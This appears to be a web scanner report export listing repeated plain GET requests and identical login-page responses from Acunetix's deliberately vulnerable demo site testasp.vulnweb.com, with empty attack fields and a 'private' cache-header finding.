<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 